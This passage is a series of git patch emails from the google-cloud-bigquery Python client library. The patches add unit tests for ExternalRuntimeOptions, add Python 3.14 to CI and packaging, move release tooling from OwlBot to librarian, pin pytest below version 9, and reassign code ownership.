expected_repr = ( + "ExternalRuntimeOptions(container_cpu=1, container_memory='1G', " + "max_batching_rows=None, runtime_connection=None, runtime_version=None)" + ) + assert repr(instance) == expected_repr + + +def test_invalid_container_memory(object_under_test): + with pytest.raises(ValueError, match="container_memory must be a string or None."): + object_under_test.container_memory = 123 + + +def test_invalid_container_cpu(object_under_test): + with pytest.raises(ValueError, match="container_cpu must be an integer or None."): + object_under_test.container_cpu = "1" + + +def test_invalid_runtime_connection(object_under_test): + with pytest.raises( + ValueError, match="runtime_connection must be a string or None." + ): + object_under_test.runtime_connection = 123 + + +def test_invalid_max_batching_rows(object_under_test): + with pytest.raises( + ValueError, match="max_batching_rows must be an integer or None." + ): + object_under_test.max_batching_rows = "100" + + +def test_invalid_runtime_version(object_under_test): + with pytest.raises(ValueError, match="runtime_version must be a string or None."): + object_under_test.runtime_version = 123 diff --git a/tests/unit/routine/test_routine.py b/tests/unit/routine/test_routine.py index acd3bc40e..965c6b2eb 100644 --- a/tests/unit/routine/test_routine.py +++ b/tests/unit/routine/test_routine.py @@ -81,6 +81,13 @@ def test_ctor_w_properties(target_class): max_batching_rows=99, user_defined_context={"foo": "bar"}, ) + external_runtime_options = bigquery.ExternalRuntimeOptions( + container_memory="1G", + container_cpu=1, + runtime_connection="projects/p/locations/l/connections/c", + max_batching_rows=100, + runtime_version="python-3.11", + ) actual_routine = target_class( routine_id, @@ -92,6 +99,7 @@ def test_ctor_w_properties(target_class): description=description, determinism_level=determinism_level, remote_function_options=options, + external_runtime_options=external_runtime_options, ) ref = 
RoutineReference.from_string(routine_id) @@ -106,6 +114,7 @@ def test_ctor_w_properties(target_class): actual_routine.determinism_level == bigquery.DeterminismLevel.NOT_DETERMINISTIC ) assert actual_routine.remote_function_options == options + assert actual_routine.external_runtime_options == external_runtime_options def test_ctor_invalid_remote_function_options(target_class): @@ -119,6 +128,17 @@ def test_ctor_invalid_remote_function_options(target_class): ) +def test_ctor_invalid_external_runtime_options(target_class): + with pytest.raises( + ValueError, + match=".*must be google.cloud.bigquery.routine.ExternalRuntimeOptions.*", + ): + target_class( + "my-proj.my_dset.my_routine", + external_runtime_options=object(), + ) + + def test_from_api_repr(target_class): from google.cloud.bigquery.routine import RoutineArgument from google.cloud.bigquery.routine import RoutineReference @@ -155,6 +175,13 @@ def test_from_api_repr(target_class): }, }, "dataGovernanceType": "DATA_MASKING", + "externalRuntimeOptions": { + "containerMemory": "1G", + "containerCpu": 1, + "runtimeConnection": "projects/p/locations/l/connections/c", + "maxBatchingRows": 100, + "runtimeVersion": "python-3.11", + }, } actual_routine = target_class.from_api_repr(resource) @@ -194,6 +221,14 @@ def test_from_api_repr(target_class): assert actual_routine.remote_function_options.max_batching_rows == 50 assert actual_routine.remote_function_options.user_defined_context == {"foo": "bar"} assert actual_routine.data_governance_type == "DATA_MASKING" + assert actual_routine.external_runtime_options.container_memory == "1G" + assert actual_routine.external_runtime_options.container_cpu == 1 + assert ( + actual_routine.external_runtime_options.runtime_connection + == "projects/p/locations/l/connections/c" + ) + assert actual_routine.external_runtime_options.max_batching_rows == 100 + assert actual_routine.external_runtime_options.runtime_version == "python-3.11" def 
test_from_api_repr_tvf_function(target_class): @@ -297,6 +332,7 @@ def test_from_api_repr_w_minimal_resource(target_class): assert actual_routine.determinism_level is None assert actual_routine.remote_function_options is None assert actual_routine.data_governance_type is None + assert actual_routine.external_runtime_options is None def test_from_api_repr_w_unknown_fields(target_class): @@ -571,6 +607,12 @@ def test_set_remote_function_options_w_none(object_under_test): assert object_under_test._properties["remoteFunctionOptions"] is None +def test_set_external_runtime_options_w_none(object_under_test): + object_under_test.external_runtime_options = None + assert object_under_test.external_runtime_options is None + assert object_under_test._properties["externalRuntimeOptions"] is None + + def test_set_data_governance_type_w_none(object_under_test): object_under_test.data_governance_type = None assert object_under_test.data_governance_type is None From b11e09cb6ee32e451b37eda66bece2220b9ceaba Mon Sep 17 00:00:00 2001 From: Shenyang Cai Date: Wed, 15 Oct 2025 14:30:12 -0700 Subject: [PATCH 183/202] fix: include `io.IOBase` in the `PathType` (#2323) --- google/cloud/bigquery/client.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index ea592852a..c50e7c2d7 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -139,7 +139,7 @@ if typing.TYPE_CHECKING: # pragma: NO COVER # os.PathLike is only subscriptable in Python 3.9+, thus shielding with a condition. 
- PathType = Union[str, bytes, os.PathLike[str], os.PathLike[bytes]] + PathType = Union[str, bytes, os.PathLike[str], os.PathLike[bytes], io.IOBase] _DEFAULT_CHUNKSIZE = 100 * 1024 * 1024 # 100 MB _MAX_MULTIPART_SIZE = 5 * 1024 * 1024 _DEFAULT_NUM_RETRIES = 6 From 6065e14c448cb430189982dd70025fa0575777ca Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Mon, 20 Oct 2025 15:06:52 -0400 Subject: [PATCH 184/202] feat: adds support for Python runtime 3.14 (#2322) * feat: adds support for Python runtime 3.14 * adds step to install gdal * adds files required by pyarrow * adds repo required by pyarrow * corrects url to repo required by pyarrow * testing a theory with a conditional * testing a theory with a conditional version of ubuntu * testing a new approach to installing arrow * testing a new approach to dearmoring the key * back to the basics * trying a conditional again. * adds explanatory comment resets ubuntu version to latest * Apply suggestion from @chalmerlowe * Apply suggestion from @chalmerlowe * Apply suggestion from @chalmerlowe * Apply suggestion from @chalmerlowe --- .github/sync-repo-settings.yaml | 1 + .github/workflows/unittest.yml | 11 ++++++++--- CONTRIBUTING.rst | 4 +++- noxfile.py | 2 +- owlbot.py | 2 +- pyproject.toml | 3 +++ testing/constraints-3.14.txt | 2 ++ 7 files changed, 19 insertions(+), 6 deletions(-) create mode 100644 testing/constraints-3.14.txt diff --git a/.github/sync-repo-settings.yaml b/.github/sync-repo-settings.yaml index 1e61b4d65..ac91806eb 100644 --- a/.github/sync-repo-settings.yaml +++ b/.github/sync-repo-settings.yaml @@ -19,6 +19,7 @@ branchProtectionRules: - 'Samples - Python 3.11' - 'Samples - Python 3.12' - 'Samples - Python 3.13' + - 'Samples - Python 3.14' - pattern: v2 requiresLinearHistory: true requiresCodeOwnerReviews: true diff --git a/.github/workflows/unittest.yml b/.github/workflows/unittest.yml index 24c9ddbaf..f6b92547e 100644 --- a/.github/workflows/unittest.yml +++ b/.github/workflows/unittest.yml @@ -5,11 
+5,10 @@ on: name: unittest jobs: unit: - # Use `ubuntu-latest` runner. runs-on: ubuntu-latest strategy: matrix: - python: ['3.9', '3.11', '3.12', '3.13'] + python: ['3.9', '3.10', '3.11', '3.12', '3.13', '3.14'] steps: - name: Checkout uses: actions/checkout@v4 @@ -22,6 +21,12 @@ jobs: python -m pip install --upgrade setuptools pip wheel python -m pip install nox - name: Run unit tests + + # TODO (https://b.corp.google.com/issues/450370502) 3.14 is not yet supported by pyarrow. See + # https://github.com/googleapis/google-cloud-python/issues/14686 + # https://github.com/apache/arrow/issues/47438 + # Reinstate running tests with 3.14 once this bug is fixed + if: matrix.python != '3.14' env: COVERAGE_FILE: .coverage-${{ matrix.python }} run: | @@ -38,7 +43,7 @@ jobs: runs-on: ubuntu-latest strategy: matrix: - python: ['3.9', '3.13'] + python: ['3.9', '3.14'] steps: - name: Checkout uses: actions/checkout@v4 diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst index b2993768b..3f8653f4b 100644 --- a/CONTRIBUTING.rst +++ b/CONTRIBUTING.rst @@ -22,7 +22,7 @@ In order to add a feature: documentation. - The feature must work fully on the following CPython versions: - 3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows. + 3.9, 3.10, 3.11, 3.12, 3.13 and 3.14 on both UNIX and Windows. - The feature must not add unnecessary dependencies (where "unnecessary" is of course subjective, but new dependencies should @@ -226,12 +226,14 @@ We support: - `Python 3.11`_ - `Python 3.12`_ - `Python 3.13`_ +- `Python 3.14`_ .. _Python 3.9: https://docs.python.org/3.9/ .. _Python 3.10: https://docs.python.org/3.10/ .. _Python 3.11: https://docs.python.org/3.11/ .. _Python 3.12: https://docs.python.org/3.12/ .. _Python 3.13: https://docs.python.org/3.13/ +.. _Python 3.14: https://docs.python.org/3.14/ Supported versions can be found in our ``noxfile.py`` `config`_. 
diff --git a/noxfile.py b/noxfile.py index eb79c238d..2457382fb 100644 --- a/noxfile.py +++ b/noxfile.py @@ -39,7 +39,7 @@ DEFAULT_PYTHON_VERSION = "3.9" SYSTEM_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12", "3.13"] -UNIT_TEST_PYTHON_VERSIONS = ["3.9", "3.11", "3.12", "3.13"] +UNIT_TEST_PYTHON_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13", "3.14"] CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute() diff --git a/owlbot.py b/owlbot.py index 80cf9d6e3..bd694180f 100644 --- a/owlbot.py +++ b/owlbot.py @@ -56,7 +56,7 @@ "pandas": "https://pandas.pydata.org/pandas-docs/stable/", }, system_test_python_versions=["3.9", "3.13"], - unit_test_python_versions=["3.9", "3.10", "3.11", "3.12", "3.13"], + unit_test_python_versions=["3.9", "3.10", "3.11", "3.12", "3.13", "3.14"], default_python_version="3.9", ) diff --git a/pyproject.toml b/pyproject.toml index 1c6ec1f77..a0e356b34 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -38,6 +38,7 @@ classifiers = [ "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", + "Programming Language :: Python :: 3.14", "Operating System :: OS Independent", "Topic :: Internet", ] @@ -69,6 +70,7 @@ bqstorage = [ # https://github.com/grpc/grpc/pull/15254 "grpcio >= 1.47.0, < 2.0.0", "grpcio >= 1.49.1, < 2.0.0; python_version >= '3.11'", + "grpcio >= 1.75.1, < 2.0.0; python_version >= '3.14'", "pyarrow >= 4.0.0", ] pandas = [ @@ -76,6 +78,7 @@ pandas = [ "pandas-gbq >= 0.26.1", "grpcio >= 1.47.0, < 2.0.0", "grpcio >= 1.49.1, < 2.0.0; python_version >= '3.11'", + "grpcio >= 1.75.1, < 2.0.0; python_version >= '3.14'", "pyarrow >= 3.0.0", "db-dtypes >= 1.0.4, < 2.0.0", ] diff --git a/testing/constraints-3.14.txt b/testing/constraints-3.14.txt new file mode 100644 index 000000000..6bd20f5fb --- /dev/null +++ b/testing/constraints-3.14.txt @@ -0,0 +1,2 @@ +# Constraints for Python 3.14 +grpcio >= 1.75.1 From 68e915f5c6a6106a7d9ccd9f76c54cd7088a8870 Mon Sep 17 
00:00:00 2001 From: Anthonios Partheniou Date: Fri, 7 Nov 2025 13:29:40 -0500 Subject: [PATCH 185/202] chore(librarian): onboard to librarian (#2326) Towards https://github.com/googleapis/librarian/issues/2456 Files removed which are no longer used - Owlbot config files, including owlbot.py - Sync repo settings config file - Release please config files --- .github/.OwlBot.lock.yaml | 17 ----- .github/.OwlBot.yaml | 22 ------ .github/auto-approve.yml | 3 - .github/release-please.yml | 14 ---- .github/release-trigger.yml | 2 - .github/sync-repo-settings.yaml | 32 -------- .librarian/state.yaml | 10 +++ owlbot.py | 126 -------------------------------- 8 files changed, 10 insertions(+), 216 deletions(-) delete mode 100644 .github/.OwlBot.lock.yaml delete mode 100644 .github/.OwlBot.yaml delete mode 100644 .github/auto-approve.yml delete mode 100644 .github/release-please.yml delete mode 100644 .github/release-trigger.yml delete mode 100644 .github/sync-repo-settings.yaml create mode 100644 .librarian/state.yaml delete mode 100644 owlbot.py diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml deleted file mode 100644 index 4a311db02..000000000 --- a/.github/.OwlBot.lock.yaml +++ /dev/null @@ -1,17 +0,0 @@ -# Copyright 2025 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
-docker: - image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:543e209e7c1c1ffe720eb4db1a3f045a75099304fb19aa11a47dc717b8aae2a9 -# created: 2025-10-09T14:48:42.914384887Z diff --git a/.github/.OwlBot.yaml b/.github/.OwlBot.yaml deleted file mode 100644 index 8b142686c..000000000 --- a/.github/.OwlBot.yaml +++ /dev/null @@ -1,22 +0,0 @@ -# Copyright 2021 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -docker: - image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - -deep-remove-regex: - - /owl-bot-staging - -begin-after-commit-hash: f2de93abafa306b2ebadf1d10d947db8bcf2bf15 - diff --git a/.github/auto-approve.yml b/.github/auto-approve.yml deleted file mode 100644 index 311ebbb85..000000000 --- a/.github/auto-approve.yml +++ /dev/null @@ -1,3 +0,0 @@ -# https://github.com/googleapis/repo-automation-bots/tree/main/packages/auto-approve -processes: - - "OwlBotTemplateChanges" diff --git a/.github/release-please.yml b/.github/release-please.yml deleted file mode 100644 index 5161ab347..000000000 --- a/.github/release-please.yml +++ /dev/null @@ -1,14 +0,0 @@ -releaseType: python -handleGHRelease: true -# NOTE: this section is generated by synthtool.languages.python -# See https://github.com/googleapis/synthtool/blob/master/synthtool/languages/python.py -branches: -- branch: v2 - handleGHRelease: true - releaseType: python -- branch: v1 - handleGHRelease: true - releaseType: python -- branch: v0 - handleGHRelease: true 
- releaseType: python diff --git a/.github/release-trigger.yml b/.github/release-trigger.yml deleted file mode 100644 index b975c190d..000000000 --- a/.github/release-trigger.yml +++ /dev/null @@ -1,2 +0,0 @@ -enabled: true -multiScmName: python-bigquery diff --git a/.github/sync-repo-settings.yaml b/.github/sync-repo-settings.yaml deleted file mode 100644 index ac91806eb..000000000 --- a/.github/sync-repo-settings.yaml +++ /dev/null @@ -1,32 +0,0 @@ -# https://github.com/googleapis/repo-automation-bots/tree/main/packages/sync-repo-settings -mergeCommitAllowed: false -# Rules for main branch protection -branchProtectionRules: -# Identifies the protection rule pattern. Name of the branch to be protected. -# Defaults to `main` -- pattern: main - requiresLinearHistory: true - requiresCodeOwnerReviews: true - requiresStrictStatusChecks: true - requiredStatusCheckContexts: - - 'Kokoro' - - 'Kokoro system-3.13' - - 'Kokoro snippets-3.13' - - 'cla/google' - - 'Samples - Lint' - - 'Samples - Python 3.9' - - 'Samples - Python 3.10' - - 'Samples - Python 3.11' - - 'Samples - Python 3.12' - - 'Samples - Python 3.13' - - 'Samples - Python 3.14' -- pattern: v2 - requiresLinearHistory: true - requiresCodeOwnerReviews: true - requiresStrictStatusChecks: true - requiredStatusCheckContexts: - - 'Kokoro' - - 'cla/google' - - 'Samples - Lint' - - 'Samples - Python 3.9' - - 'Samples - Python 3.10' diff --git a/.librarian/state.yaml b/.librarian/state.yaml new file mode 100644 index 000000000..1834779bc --- /dev/null +++ b/.librarian/state.yaml @@ -0,0 +1,10 @@ +image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:39628f6e89c9cad27973b9a39a50f7052bec0435ee58c7027b4fa6b655943e31 +libraries: + - id: google-cloud-bigquery + version: 3.38.0 + apis: [] + source_roots: + - . 
+ preserve_regex: [] + remove_regex: [] + tag_format: v{version} diff --git a/owlbot.py b/owlbot.py deleted file mode 100644 index bd694180f..000000000 --- a/owlbot.py +++ /dev/null @@ -1,126 +0,0 @@ -# Copyright 2018 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -"""This script is used to synthesize generated parts of this library.""" -from pathlib import Path - -import synthtool as s -from synthtool import gcp -from synthtool.languages import python - -REPO_ROOT = Path(__file__).parent.absolute() - -default_version = "v2" - -for library in s.get_staging_dirs(default_version): - # Avoid breaking change due to change in field renames. 
- # https://github.com/googleapis/python-bigquery/issues/319 - s.replace( - library / f"google/cloud/bigquery_{library.name}/types/standard_sql.py", - r"type_ ", - "type ", - ) - # Patch docs issue - s.replace( - library / f"google/cloud/bigquery_{library.name}/types/model.py", - r"""\"predicted_\"""", - """`predicted_`""", - ) - s.move(library / f"google/cloud/bigquery_{library.name}/types") -s.remove_staging_dirs() - -common = gcp.CommonTemplates() - -# ---------------------------------------------------------------------------- -# Add templated files -# ---------------------------------------------------------------------------- -templated_files = common.py_library( - cov_level=100, - samples=True, - microgenerator=True, - split_system_tests=True, - intersphinx_dependencies={ - "dateutil": "https://dateutil.readthedocs.io/en/latest/", - "geopandas": "https://geopandas.org/", - "pandas": "https://pandas.pydata.org/pandas-docs/stable/", - }, - system_test_python_versions=["3.9", "3.13"], - unit_test_python_versions=["3.9", "3.10", "3.11", "3.12", "3.13", "3.14"], - default_python_version="3.9", -) - -# BigQuery has a custom multiprocessing note -s.move( - templated_files, - excludes=[ - "noxfile.py", - "renovate.json", - "docs/multiprocessing.rst", - "docs/index.rst", - ".coveragerc", - ".github/CODEOWNERS", - # Include custom SNIPPETS_TESTS job for performance. 
- # https://github.com/googleapis/python-bigquery/issues/191 - ".kokoro/presubmit/presubmit.cfg", - ".kokoro/presubmit/system-3.8.cfg", - ".kokoro/continuous/prerelease-deps.cfg", - ".kokoro/samples/python3.7/**", - ".kokoro/samples/python3.8/**", - ".github/workflows/**", # exclude gh actions as credentials are needed for tests - "README.rst", - ], -) - -python.configure_previous_major_version_branches() - -s.replace( - ".kokoro/test-samples-impl.sh", - """# `virtualenv==20.26.6` is added for Python 3.7 compatibility -python3.9 -m pip install --upgrade --quiet nox virtualenv==20.26.6""", - "python3.9 -m pip install --upgrade --quiet nox virtualenv", -) - -s.replace( - "CONTRIBUTING.rst", - r"\$ nox -s py-3.8", - r"$ nox -s py-3.9", -) - -s.replace( - "scripts/readme-gen/templates/install_deps.tmpl.rst", - r"Samples are compatible with Python 3.7", - r"Samples are compatible with Python 3.9", -) - - -# ---------------------------------------------------------------------------- -# Samples templates -# ---------------------------------------------------------------------------- - -python.py_samples() - -s.replace( - "samples/**/noxfile.py", - 'BLACK_VERSION = "black==22.3.0"', - 'BLACK_VERSION = "black==23.7.0"', -) -s.replace( - "samples/**/noxfile.py", - r'ALL_VERSIONS = \["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"\]', - 'ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"]', -) - -s.shell.run(["nox", "-s", "blacken"], hide_output=False) -for noxfile in REPO_ROOT.glob("samples/**/noxfile.py"): - s.shell.run(["nox", "-s", "blacken"], cwd=noxfile.parent, hide_output=False) From 8016baa2b1797324c10208c30be991bd00f92a0b Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Fri, 21 Nov 2025 11:19:22 -0500 Subject: [PATCH 186/202] tests: temporarily pin pytest (#2334) Temporarily pin `pytest < 9` to resolve the following issue ``` for invalid_view_value in invalid_view_values: > with self.subTest(invalid_view_value=invalid_view_value): 
tests/unit/test_client.py:810: _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ /opt/hostedtoolcache/Python/3.11.14/x64/lib/python3.11/contextlib.py:144: in __exit__ next(self.gen) /opt/hostedtoolcache/Python/3.11.14/x64/lib/python3.11/contextlib.py:144: in __exit__ next(self.gen) .nox/unit-3-11/lib/python3.11/site-packages/_pytest/unittest.py:438: in addSubTest self.ihook.pytest_runtest_logreport(report=sub_report) .nox/unit-3-11/lib/python3.11/site-packages/pluggy/_hooks.py:512: in __call__ return self._hookexec(self.name, self._hookimpls.copy(), kwargs, firstresult) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .nox/unit-3-11/lib/python3.11/site-packages/pluggy/_manager.py:120: in _hookexec return self._inner_hookexec(hook_name, methods, kwargs, firstresult) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .nox/unit-3-11/lib/python3.11/site-packages/xdist/remote.py:289: in pytest_runtest_logreport self.sendevent("testreport", data=data) .nox/unit-3-11/lib/python3.11/site-packages/xdist/remote.py:126: in sendevent self.channel.send((name, kwargs)) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:912: in send self.gateway._send(Message.CHANNEL_DATA, self.id, dumps_internal(item)) ^^^^^^^^^^^^^^^^^^^^ .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1629: in dumps_internal return _Serializer().save(obj) # type: ignore[return-value] ^^^^^^^^^^^^^^^^^^^^^^^ .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1647: in save self._save(obj) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save dispatch(self, obj) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1744: in save_tuple self._save(item) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save dispatch(self, obj) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict 
self._write_setitem(key, value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem self._save(value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save dispatch(self, obj) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict self._write_setitem(key, value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem self._save(value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save dispatch(self, obj) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict self._write_setitem(key, value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem self._save(value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save dispatch(self, obj) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict self._write_setitem(key, value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem self._save(value) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ self = obj = def _save(self, obj: object) -> None: tp = type(obj) try: dispatch = self._dispatch[tp] except KeyError: methodname = "save_" + tp.__name__ meth: Callable[[_Serializer, object], None] | None = getattr( self.__class__, methodname, None ) if meth is None: > raise DumpError(f"can't serialize {tp}") from None E execnet.gateway_base.DumpError: can't serialize ``` The upstream issue is tracked in https://github.com/pytest-dev/pytest-xdist/issues/1273 --- noxfile.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/noxfile.py b/noxfile.py index 2457382fb..194e7ce8f 100644 --- a/noxfile.py +++ b/noxfile.py @@ -95,7 +95,8 @@ def default(session, install_extras=True): # Install all test dependencies, then install local packages in-place. 
session.install( - "pytest", + # TODO(https://github.com/pytest-dev/pytest-xdist/issues/1273): Remove once this bug is fixed + "pytest<9", "google-cloud-testutils", "pytest-cov", "pytest-xdist", From 0529726400b1df4ade75cc3c9a829632ccb72eb8 Mon Sep 17 00:00:00 2001 From: ohmayr Date: Fri, 21 Nov 2025 08:42:31 -0800 Subject: [PATCH 187/202] chore: update librarian sha (#2329) This PR updates the librarian sha to support v1.0.0 --- .librarian/state.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.librarian/state.yaml b/.librarian/state.yaml index 1834779bc..b5d3126e4 100644 --- a/.librarian/state.yaml +++ b/.librarian/state.yaml @@ -1,4 +1,4 @@ -image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:39628f6e89c9cad27973b9a39a50f7052bec0435ee58c7027b4fa6b655943e31 +image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620 libraries: - id: google-cloud-bigquery version: 3.38.0 From 91fed546bf0cf7f3feaa44453cc7dc2394fdbd92 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 26 Nov 2025 10:56:58 -0500 Subject: [PATCH 188/202] chore(python): removes a filter put in place due to a dependency issue with pyarrow (#2338) Due to an issue with `pyarrow`, a significant dependency for certain python-bigquery use cases, not being compatible with Python 3.14, we temporarily skipped the failing CI/CD check for 3.14 while awaiting the update to pyarrow. Pyarrow is now fully compatible, so that filter is being removed. **KNOWN ISSUES**: this will show that unittests for 3.14 are failing. This has nothing to do with this PR/these changes. It is being addressed in an alternate mod. It is due to a missing dependency related to handling IO for `geopandas` (namely it is missing `libgdal-dev`, etc which are normally installed with `pyogrio` + `geopandas`). 
Because `pyogrio` is currently not compatible with Python 3.14 the tests in 3.14 cannot complete. This should not prevent **this PR from being merged** to help solve the current issue, which is a blocker for getting our continuous tests to green. --- .github/workflows/unittest.yml | 6 ------ 1 file changed, 6 deletions(-) diff --git a/.github/workflows/unittest.yml b/.github/workflows/unittest.yml index f6b92547e..550724076 100644 --- a/.github/workflows/unittest.yml +++ b/.github/workflows/unittest.yml @@ -21,12 +21,6 @@ jobs: python -m pip install --upgrade setuptools pip wheel python -m pip install nox - name: Run unit tests - - # TODO (https://b.corp.google.com/issues/450370502) 3.14 is not yet supported by pyarrow. See - # https://github.com/googleapis/google-cloud-python/issues/14686 - # https://github.com/apache/arrow/issues/47438 - # Reinstate running tests with 3.14 once this bug is fixed - if: matrix.python != '3.14' env: COVERAGE_FILE: .coverage-${{ matrix.python }} run: | From fcaf397def1a8c7a05bae9f30f268dc696c4bba3 Mon Sep 17 00:00:00 2001 From: shollyman Date: Mon, 15 Dec 2025 13:10:04 -0800 Subject: [PATCH 189/202] chore: update ownership/routing for repo (#2346) This PR effectively moves ownership for this repo to the python language team, and removes api-bigquery as the defacto code owner. 
--- .github/CODEOWNERS | 6 +++--- .github/blunderbuss.yml | 6 +++--- .repo-metadata.json | 2 +- 3 files changed, 7 insertions(+), 7 deletions(-) diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 6763f258c..c7478150e 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -4,8 +4,8 @@ # For syntax help see: # https://help.github.com/en/github/creating-cloning-and-archiving-repositories/about-code-owners#codeowners-syntax -# The @googleapis/api-bigquery is the default owner for changes in this repo -* @googleapis/api-bigquery @googleapis/yoshi-python +# The @googleapis/python-core-client-libraries is the default owner for changes in this repo +* @googleapis/python-core-client-libraries @googleapis/yoshi-python # The python-samples-reviewers team is the default owner for samples changes -/samples/ @googleapis/api-bigquery @googleapis/python-samples-owners @googleapis/yoshi-python +/samples/ @googleapis/python-core-client-libraries @googleapis/python-samples-owners @googleapis/yoshi-python diff --git a/.github/blunderbuss.yml b/.github/blunderbuss.yml index 5b7383dc7..ff168399d 100644 --- a/.github/blunderbuss.yml +++ b/.github/blunderbuss.yml @@ -4,14 +4,14 @@ # Note: This file is autogenerated. To make changes to the assignee # team, please update `codeowner_team` in `.repo-metadata.json`. 
assign_issues: - - googleapis/api-bigquery + - googleapis/python-core-client-libraries assign_issues_by: - labels: - "samples" to: - googleapis/python-samples-reviewers - - googleapis/api-bigquery + - googleapis/python-core-client-libraries assign_prs: - - googleapis/api-bigquery + - googleapis/python-core-client-libraries diff --git a/.repo-metadata.json b/.repo-metadata.json index d1be7ec4d..82a1684ca 100644 --- a/.repo-metadata.json +++ b/.repo-metadata.json @@ -12,7 +12,7 @@ "api_id": "bigquery.googleapis.com", "requires_billing": false, "default_version": "v2", - "codeowner_team": "@googleapis/api-bigquery", + "codeowner_team": "@googleapis/python-core-client-libraries", "api_shortname": "bigquery", "api_description": "is a fully managed, NoOps, low cost data analytics service.\nData can be streamed into BigQuery at millions of rows per second to enable real-time analysis.\nWith BigQuery you can easily deploy Petabyte-scale Databases." } From 8634630fca32ae38ce6b4ef27679bb7444be59c6 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Mon, 15 Dec 2025 18:20:36 -0500 Subject: [PATCH 190/202] chore: librarian release pull request: 20251212T151524Z (#2344) PR created by the Librarian CLI to initialize a release. Merging this PR will auto trigger a release. Librarian Version: v0.7.0 Language Image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
